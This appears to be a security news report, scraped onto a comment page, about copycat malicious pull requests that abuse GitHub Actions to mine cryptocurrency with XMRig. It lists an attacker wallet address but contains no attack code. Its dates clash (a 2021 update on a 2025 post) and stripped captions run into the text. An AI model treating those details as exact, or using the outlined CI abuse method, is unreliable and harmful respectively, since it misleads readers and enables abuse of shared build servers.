Comment
Author: Admin | 2025-04-28
A software engineer at Sonatype became aware of the copycat attack targeting multiple GitHub repositories and notified me.Malicious copycat Pull Requests abusing GitHub Actions for crypto-mining attackSource: BleepingComputerThe user account opening malicious Pull Requests (shown above ) appears to have done so for over 50 legitimate repositories.This figure is in addition to the 90+ repositories targeted by threat actor(s) thus far.As analyzed by BleepingComputer, a variation of this attack pulls in the open-source XMRig crypto-miner right from XMRig's official GitHub repository.The wallet address observed in this copycat attack was:49eqpX3Sn2d5cfJTevgZLGZGQmcdE37QE4TMJDmDcJeCG8DUgkbS5znSsU35Pk2HC1Lt99EnSiP9g74XpUHzTgxw23n5CkBA list of servers in the pool is shown below, in the ci.yml file modified by the attacker(s):Copycat attacks spotted on GitHub with a different miner and wallet addressSource: BleepingComputerGitHub had stated to The Record that they were aware of this activity, which was being actively investigated.This isn't the first time an attack leveraging GitHub infrastructure has abused GitHub Actions.Previously, another programmer had described an identical attack in which an attacker had filed a malicious Pull Request against Esposito's GitHub project.Last year, BleepingComputer also reported on GitHub being abused to host a wormable botnet Gitpaste-12 which returned the following month with over 30 exploits.But, unlike Gitpaste-12 or Octopus Scanner malware that targeted vulnerable projects and devices, as of now, this particular attack seems to be solely abusing GitHub servers for its crypto mining tasks.Thanks to ANY.RUN for malware analysis VM access.Update 3-Apr-21 9:42 AM ET: Added an update on copycat attack discovered by a Sonatype engineer recently.
Add Comment